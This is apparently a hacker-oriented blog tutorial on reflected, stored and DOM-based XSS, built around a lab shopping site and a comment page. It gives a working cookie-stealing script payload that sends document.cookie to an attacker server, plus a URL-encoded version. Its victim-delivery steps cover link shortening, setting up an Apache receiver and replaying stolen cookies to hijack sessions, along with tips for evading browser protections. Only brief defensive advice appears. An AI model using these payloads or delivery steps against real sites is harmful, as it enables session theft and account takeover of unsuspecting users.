XSS Details

Hello Hackers
How are you, today we will talk about very strong details, God willing, about the XSS (Cross-Site Scripting) , the journey will be a bit long, so.. let’s start

Why is it called that despite the CSS word abbreviations ?!
This is because it may conflict with the CSS (Cascading Style Sheets)style language

First, there are three types of this vulnerability, and they are

1- XSS Reflected

2- XSS Stored

3- XSS DOM

😥انت كدا كبرت الموضوع ياصاحبي ع فكره

1- XSS Reflected

First, let’s understand why the vulnerability occurs in this way, why it is called by this name, and what error the programmer made while writing the site’s code

• why the vulnerability occurs in this way ?

It occurs primarily because the programmer has trusted the user’s input

ميعرفش انه ممكن يكون هكر من

And it manipulates the inputs

The programmers code may look like this, or it may be the same idea

Here he makes a condition that there is a get request Checking for a field to search for anything on the site, for example

Then, it was based on the user’s input in this form, and then the programmer printed it on the page

To protect your page from this type of attack, all user input (such as forms and inputs) must be properly validated and cleaned to remove any malicious code before it is displayed on the page

Security libraries such as Content Security Policy (CSP) and input validation can be used to help prevent these vulnerabilities

# Almost complete example to illustrate the idea (Of course, without going into details of formats, this may happen as in the following example)

To be more clear, it appears to be a shopping site
The site asks you to search for your favorite product in a search box
The bad mistake I make here is to trust the user’s input without encodeing or filtering the input

• Let’s take a look at the consequences of this error

This is the content of the page It looks like someone is looking for a tomato , And the results were :)

Great they have tomatoes .. But

One important thing while experimenting or looking for bugs is to look at the source code (this is very important)

The interesting thing is that what was written in the input field was printed
Or ” in other technical terms ” it has been processed to show you the result as you see it

This means that it is possible to inject something that could be harmful

But if you want to inject, do not write the entire payload. So let’s try important and specific parts of the payload to understand what is happening here

One of the most important and simplest things in payloads is that marks

( < > ‘ “ )

But why !!

Because these signs are a large and very important part of the HTML code .. Focus a little on the source code in the previous pictures .. Ask yourself What does it consist of ??!

So when I do this .. you must answer yourself to understand why and why I am trying this way exactly

And soon you’ll know why after you see this result

Why go see and verification the source code (Entry field results)

I do this because based on the form of the source code, I will inject this Form ..

Since it does not clean and filter the input or even encoding it
Let’s inject our payload hackers 😈

here we go .. I will inject this for example

 <h1>tomatos</h1>

And Result is !!

• Remember to always look at the source code

As you can see, we can inject this website page

But why is it called by that name ? XSS Reflected !

This is because it is only reflected in your browser.. as if you were looking into a mirror
But from here you see who grabs his your mirror and controls him.. Yes, it is you, hacker 😈

But is it possible that a hacker could exploit this vulnerability in Tomatoes printing only in a different way?

The attacker can

• Cookie theft: An attacker can use the vulnerability to steal user data such as username, password, and other personal information
• Account compromise: An attacker can use the vulnerability to compromise user accounts by obtaining login data
• Execute malicious commands: An attacker can use the vulnerability to execute malicious commands on a victim’s machine, such as installing malicious software or running spyware
• Page tampering: An attacker can use the vulnerability to modify the content of the page and show false information to the user
• And more ..

For example, exploiting the vulnerability would be to enter what you send to the victim, and after the victim enters it, malicious commands will be executed on it ..

There are a lot of exploits that you can use in the end, it depends on your personal situation, but I will explain here a small example of stealing user cookies , an example :

document.location="URL?c=" + document.cookie ;

First let’s make a few simple changes :

First , Add cookies to the user :

I’ve added content to cookies that humans understand (Lging_users)to illustrate the following examples This is what the programmer does But the programmer relies on a certain algorithm that makes cookies like this (sdfksdnfkjsndkjnfsdjknskdgn) ” but this just to clarify the idea”

And once the reload is done :

As you see the value of cookies in value

And now here is the complete php code, which, once the web page is reloaded, checks for cookies with the name _user , If it does not exist, it create it, and if it does exist, nothing will happen :

We will modify php to look like this :

Now let’s explain the code:

• First, we make a condition to verify the presence of cookies named Mohammed , If it exists, we will transfer the user to a page called test2 .php , though not that ..
• We will first verify the get request and then store it in a variable called search , And if so ..
• We will check the value of a search, if it is Mohammed. I will make a condition. If there are no cookies called Mohammed, I will create it. If it exists, we will go directly to the value of else
  Which its function displays the content you are looking for “It is the affected variable, do not forget ” 🤫😉

And This is the content of the test2.php page, and to make it sensitive data, I’m showing cookies here on that page using javaScript :

<script>document.write(document.cookie)</script>

Now let’s try what we did ..

As you can see, if you enter any value different from mohammed, the result will be the display of that value on the page and when you enter my name
It will direct me to another page called test2.php :

test2.php

In this way, we have ensured that sensitive and important content appears on the test2.php
We have made sure that this content (cookies) will only be shown to the user Mohammed, so that it is Mohammed who registered “ it could be an email or something else and not just a username because it is not considered a real metric”

Now 😈
Let’s exploit this loophole like real hackers
And we steal the user’s cookies

Important:

These explanations are for security awareness, and this is a disclaimer for your use of this method on any site affected by this security vulnerability

In the following example, will be the payload for stealing cookies in this way :

<script>document.location='http://192.168.43.241/attacker.php?cookie='+document.cookie</script>

And I will use another machine, and then I will make it my own server
Then I will write the appropriate php code to receive the cookie value

• It went to “ /var/www/html “
  Because this path is the default path for running Apache server files

 cd /var/www/html 

• And Running Apache Server (usage root permissions)

service apache2 start 

• Show Attacker IP or Server Attacker IP

ifconfig

Now let’s start hacking

in my case i’am Typing this Code PHP , I don’t want to go too deep to explain, if you are familiar with JavaScript, PHP
You will see that it is very easy, and you can do a lot once the victim goes to your server

Now , In the event that the victim enters this code without his knowledge of the programming
The result will be his cookies being stolen and then being sent back to the same previous page, which in our case here is the Markets Shop site

Sometimes you can create your own link instead of entering your IP like this “192.168.43.241”
You can also encode or encrypting this line of code to change this format <script>document.location=’http://192.168.43.241/attacker.php?cookie='+document.cookie</script>

You can change this previous form also to other forms in more than one way .. example

• You can change the form of the input that you want to send to someone by encrypting the previous value

In the previous example, it is a personal script that I use to encoding the URL

• You can send a link to the victim if you know that he is using a site and this site is infected with this vulnerability

For example when you’re typing a quiz, as you can see it appears in the URL above .. What if we did ?!

http://192.168.43.40/test.php?search=%3Cscript%3E%20document.location%20=%20%27http:%20//192.168.43.241/attacker.php%D8%9F%20cookie%20=%27%20+%20document.cookie%20%3C%20/%20script%20%3E

And then send this link to the victim, for sure in any case will be the result , This !

This !

Or you can go to sites to shorten your link, for example :

And This Result -> https://bit.ly/3FUVU7i

u Send To The Victim

Now that the victim has entered the previous code, we have obtained the cookies for this user

And Of course, the victim was directed to the previous page again, “the page from which he came previously”

Modern browsers now .. may detect these methods or more accurately these payloads .. because your browser implements a solution that we will discuss later

Therefore, if the attack did not work on an external server (the attacker’s server), you should either download an old version of the browsers or try it on your local server, but with a different path
for example: <script>document.location=’http://192.168.43.40/attacker.php?cookie='+document.cookie</script>

This will send cookies to another page on your device (as if they were being sent to the attacker’s computer)

This idea of attack will be discussed and things will be fine, ان شاء الله

I guess he won’t see or suspect anything strange …
It may just occur to him that it is an internet problem and the page has been reloaded for some reason .. But only you know what happened

After obtaining cookies, you can either use them through the cookie editor on Chrome, Fire fox, or any browser or Use BurpSuite

In my case I have used “ Cookie Editor ” extension

Hence, you are logged in using cookies

2- XSS Stored

Stored XSS is a security vulnerability that threatens websites and allows attackers to inject malicious data into pages that other users see when they visit the site

For example, if a website programmer stores user information in a website server’s database without sufficient verification )Sometimes it is stored in the client’s browser) , an attacker can inject malicious scripts or code (such as JavaScript) into their user data, thus gaining control over which pages users see. Others carry out the orders the attacker wants

Stored XSS vulnerability can leak sensitive user data, such as passwords and personal information, and expose site users to security risks and cyber fraud

As you can see from its name (stored)

Thus it is stored in the database
For example, while you are using Facebook (comments, posts, likes, etc.), all these things are saved in the database
Therefore, there is a difference between the comments themselves and the number of comments, for example, when you delete a comment, it is deleted in your database, so the comment may be deleted, for example, but the value that displays the number of comments is not manipulated
This is just a simple example to illustrate the idea

Now let’s get started ..

open Terminal 3>

• You have started the mySQL service with the command

sudo service mqsql start 

• If it is your first time using mySQL and you want to create a password for the service, you can use the command

ALTER USER ‘root’@’localhost’ IDENTIFIED BY ‘pass123’ ; 

• The first time I created the password for the service, and as you can see, I did this successfully
• The second time, you entered the service password correctly
• The third time, you intentionally entered the password incorrectly, as this same error will also appear if you enter this command, as we did earlier “sudo mysql -u root”

First let’s see the database tables I have stored, via the command

SHOW DATABASES ; 

It is preferable to use mySQL commands in uppercase letters, not lowercase letters

If you use lowercase letters, the required will be executed, but the famous method is through uppercase letters

Let’s see the HTML and PHP codes 3>

This is how the page appears ..

The PHP code might look like this 3>

But before that, I had here a database with the name of users ..

Go to the page here and enter the data ..

After sending the data, let’s take a look at our databases “you won’t see this in the real world, but this is just to get the idea across and understand what’s going on and what’s causing the vulnerability”

• select DataBase Name

USE users ; 

• show all tables in this DataBase

SHOW TABLES ; 

• select and show all columns in this table

SELECT * FROM comments ; 

And now yeah, as you’re thinking right now, that’s what’s going to happen 😈

As long as what is written is preserved in the database!!
What if I inject a nice load right now?
Do you remember what happens when someone sees Facebook comments on your photos
Yes, exactly.. The payload will be executed on all users
The payload will be executed on anyone who sees your photo
This is why you should go after fame My friend 😅

You may feel similar from a vulnerability called sql injection, but there is a difference due to the way the programmer deals with these inputs

You can exploit this vulnerability in several ways, and as you can see, this vulnerability is very serious, as XSS Reflected requires you to contact the user and use the method of ways social engineering, but in XSS Stored it does not require any contact with a user as the payload will be executed upon his knowledge to feel anything strange

Now, after adding the comment, as soon as the page is reloaded, we will find this comment

And this after reading all the comments from the database here in PHP Code

And if you want to see the final form of the PHP and HTML codes, it will be like this :

Now, even if the payload was similar to the previous payload, do you remember it?!

<script>document.location='http://192.169.43.241/attacker.php?cookie='+ document.cookie</script>

Let’s take a look at the database (remember you won’t see this in the real world, And this is to see what’s going on behind the scenes)

Thus, while displaying the comment of the user Ahmed, this malicious code will be executed on that page (this malicious code will be executed on everyone who requests that page “the comments page”)

3- XSS DOM

XSS DOM is a security vulnerability that can be exploited in web applications, allowing a attacker to inject malicious data (usually via URL variables) and run malicious JavaScript code on a web page. This flaw puts users at risk by stealing their data or executing malicious commands

An example of what the programmer might do wrong in this case is not filtering the input that comes from the user that might be entered in a part of the web page that is loaded with JavaScript

But why is this type mostly injected through the console ??

Exploiting the XSS DOM vulnerability through the browser’s console is popular because it allows an attacker to execute various JavaScript codes on web pages visited by users, without having to write any malicious code. Once this vulnerability is exploited, the attacker can steal users’ information or run malicious commands on the user’s device.

In addition, exploiting the XSS DOM vulnerability via a browser console is much easier than exploiting this vulnerability with other malware, making it very popular among attackers. Moreover, attackers can use online tools to search for websites that suffer from this vulnerability, making it easier for them to access the sites they are targeting

Let’s take a look at the HTML code :

Let’s see the result :

And Show The Source Code !! :

It looks a bit strange !

Let’s go into a full payload to see what happens

And The Source Code !! :

I want to show you another result first before I explain something to you

I added this line :

document.write('<div>' + `Hello ${params} !` + '</div>');

And Result :

The question is why ??

• The value is taken from the URL and not the field itself as was the case here :

XSS Reflected

So in this example, the value is stored without any modification to it, because the values that are stored on the server are called using the super variable in PHP

$_GET['search']

• The value is encoded because the values in the URL must be encoded

Why are the values encoded in the URL ??

Converting text in URLs to this format is called Percent-encoding, and it is a method used to convert characters that are not allowed in URLs into ASCII codes usable on the Internet.

Relative encoding is used in URLs for several reasons, including:

1- Data protection: Relative encoding is used to protect data from tampering or hacking. When data is sent via a URL, this data is transmitted as a specific string of characters and symbols. And if this data is encoded using the correct way of letters and symbols, it becomes very difficult for anyone to convert this data into something else

2- Text formatting support: Relative encoding is used to convert characters that are not allowed in URLs into ASCII codes usable in the Internet, this helps to support the correct formatting of texts in URLs

3- Language support: Relative encoding is used to support languages that contain characters that are not allowed in URLs, such as East Asian languages, Arabic, and Hebrew

In general, relative encoding helps ensure the integrity of data transmission over the Internet, ensuring text formatting, and language support

• The text is considered part of the string entered into the field and therefore is not interpreted as JavaScript code

In other words, it looks like this:

    // <script>alert("XSS")</script>
    
    document.write('<div>' + `Hello ${params} !` + '</div>');

    // The result I mean
    // <script>alert("XSS")</script>
    document.write('<div>' + `Hello %3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E !` + '</div>');
    
    // alert("XSS")
    document.write('<div>' + `Hello alert%28%22XSS%22%29 !` + '</div>');
    
    // ` alert("XSS") `
    // (Skiping) Not This In your mind
    document.write('<div>' + `Hello ` alert("XSS") ` !` + '</div>');
    
    // This is what will happen
    document.write('<div>' + `Hello %60+alert%28%22XSS%22%29+%60 !` + '</div>');

That’s why the result is like this :

Now I will go to ` inspect > Console `

And Write 3>

document.write("Hacked By Mohammed-Khalid(0xDARK)");

Here, my friend, we have come to the end of this part
I hope you enjoyed with me the pleasure that makes you follow with me the second part

See you at another vulnerable soon
ان شاء الله

communication:

— — — — — — — — —

FaceBook

Twitter

GitHub

Linkedin